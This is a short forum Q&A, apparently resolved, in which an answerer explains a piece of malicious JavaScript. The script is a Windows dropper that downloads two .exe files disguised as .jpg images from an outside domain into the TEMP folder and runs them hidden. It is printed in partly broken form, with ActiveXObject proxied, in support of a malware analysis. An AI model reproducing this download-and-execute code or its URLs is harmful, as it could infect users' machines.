[Solved] Need help figuring out what this Js does [closed]

Basically, it’s downloading a virus to your temp folder and executing it…

You should run a virus scan on the entire network.

var AxProxy = function() {};

(function () {
    function fFh(fr, Klw, rn) {
        var VeZ = new AxProxy('WScript.Shell');
        var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
        var OG4 = new AxProxy('MSXML2.XMLHTTP');

        OG4['onReadyStateChange'] = function() {
            if (OG4['readyState'] === 4) {
                var g38 = new AxProxy('ADODB.Stream');

                g38['type'] = 1;
                g38['position'] = 0;
                g38['saveToFile'](Klw, 2);

        try {
            OG4['open']('GET', fr, false);

            if (rn > 0) {
                VeZ['Run'](Klw, 0, 0);
        } catch (er) {};

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);

All the other variables are just gibberish intended to confuse and discourage decoding.

PS: I’ve proxied ActiveXObject so this can’t be run…


solved Need help figuring out what this Js does [closed]